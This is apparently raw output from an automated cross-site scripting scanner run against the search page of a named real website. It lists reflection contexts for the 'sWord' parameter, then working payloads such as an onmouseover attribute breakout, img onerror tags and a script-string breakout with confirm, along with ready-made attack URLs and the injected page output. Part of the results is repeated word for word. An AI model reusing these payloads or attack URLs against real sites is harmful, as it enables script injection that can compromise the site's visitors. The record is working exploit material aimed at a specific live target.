https://www.datasheet4u.com

GET Params:[1]
['sWord']
_______________________________________________________________________________________________________
https://www.datasheet4u.com/search.php?sWord=/uvw"xyz'yxz<zxy

----------------------------------------------------------------------------------
Attribute Context: [1]
<input type="text" name="sWord" size="30" value="/uvw"xyz'yxz<zxy" style="width:300px;height:45px; border:solid 3px #1887DB; font-size:20">

----------------------------------------------------------------------------------
HTML Context: [2]
<title>/uvw"xyz'yxz<zxy datasheet pdf, /uvw"xyz'yxz<zxy data sheet, /uvw"xyz'yxz<zxy, /uvw"xyz'yxz<zxy.pdf, /uvw"xyz'yxz<zxy pdf, /uvw"xyz'yxz<zxy stock, /uvw"xyz'yxz<zxy circuit, /uvw"xyz'yxz<zxy datenblatt, block diagram, schematic, Datasheet4U.com</title>
<font color="red">/uvw"xyz'yxz<zxy</font>

----------------------------------------------------------------------------------
Script Context: [1]
<script type="text/javascript">
 dataLayer = [{ 'post_page':'Search','post_pn':'/uvw"xyz'yxz<zxy','post_id':'Search'}]; 
</script>

----------------------------------------------------------------------------------
URI Context: [0]

----------------------------------------------------------------------------------

	Attr-Single	Encapsulated With Double Quotes: Can't Break the Context
Mitigation        "	'	<	/ 
ATTR:		False	True	False	False

Attack Payloads for ATTR
['" onmouseover="alert`1`']

ATTR Attack Url: https://www.datasheet4u.com/search.php?sWord=" onmouseover="alert`1`

=>Detection  Successful with Payload: " onmouseover="alert`1`

FINAL OUTPUT: 
<meta NAME="keywords" content="" onmouseover="alert`1`, " onmouseover="alert`1` datasheet pdf, " onmouseover="alert`1` data sheet, Datasheet4U.com">
<meta NAME="description" content="" onmouseover="alert`1`, " onmouseover="alert`1` datasheet pdf, " onmouseover="alert`1` data sheet, Datasheet4U.com">
<link rel="canonical" href="/share_search.php?sWord=" onmouseover="alert`1`">
<input type="text" name="sWord" size="30" value="" onmouseover="alert`1`" style="width:300px;height:45px; border:solid 3px #1887DB; font-size:20">
Mitigation        "	'	<	/ 
HTML:		False	False	False	False

Attack Payloads for HTML
["<img src=x onerror='alert`1`'>", '<img src=x onerror="alert`1`">']

HTML Attack Url: https://www.datasheet4u.com/search.php?sWord=<img src=x onerror='alert`1`'>

=>Detection  Successful with Payload: <img src=x onerror='alert`1`'>

FINAL OUTPUT: 
<img src=x onerror='alert`1`'> circuit, <img src=x onerror='alert`1`'> datenblatt, block diagram, schematic, Datasheet4U.com</title>
<font color="red"><img src=x onerror='alert`1`'></font>

HTML Attack Url: https://www.datasheet4u.com/search.php?sWord=<img src=x onerror="alert`1`">

=>Detection  Successful with Payload: <img src=x onerror="alert`1`">

FINAL OUTPUT: 
<img src=x onerror="alert`1`"> circuit, <img src=x onerror="alert`1`"> datenblatt, block diagram, schematic, Datasheet4U.com</title>
<font color="red"><img src=x onerror="alert`1`"></font>
Mitigation        "	'	<	/ 
HTML:		False	False	False	False

Attack Payloads for HTML
["<img src=x onerror='alert`1`'>", '<img src=x onerror="alert`1`">']

HTML Attack Url: https://www.datasheet4u.com/search.php?sWord=<img src=x onerror='alert`1`'>

=>Detection  Successful with Payload: <img src=x onerror='alert`1`'>

FINAL OUTPUT: 
<img src=x onerror='alert`1`'> circuit, <img src=x onerror='alert`1`'> datenblatt, block diagram, schematic, Datasheet4U.com</title>
<font color="red"><img src=x onerror='alert`1`'></font>

HTML Attack Url: https://www.datasheet4u.com/search.php?sWord=<img src=x onerror="alert`1`">

=>Detection  Successful with Payload: <img src=x onerror="alert`1`">

FINAL OUTPUT: 
<img src=x onerror="alert`1`"> circuit, <img src=x onerror="alert`1`"> datenblatt, block diagram, schematic, Datasheet4U.com</title>
<font color="red"><img src=x onerror="alert`1`"></font>
	Script-Single	Encapsulated With Double Quotes: Can't Break the Context
Mitigation        "	'	<	/ 
SCRIPT:		True	False	False	False

Attack Payloads for SCRIPT
["'; confirm`1`; '", '</script><script>alert`1`</script>']

SCRIPT Attack Url: https://www.datasheet4u.com/search.php?sWord='; confirm`1`; '

=>Detection  Successful with Payload: '; confirm`1`; '

FINAL OUTPUT: 
<script type="text/javascript">
 dataLayer = [{ 'post_page':'Search','post_pn':''; confirm`1`; '','post_id':'Search'}]; 
</script>

SCRIPT Attack Url: https://www.datasheet4u.com/search.php?sWord=</script><script>alert`1`</script>

 ______Detection  UnSuccessful with payload: </script><script>alert`1`</script>

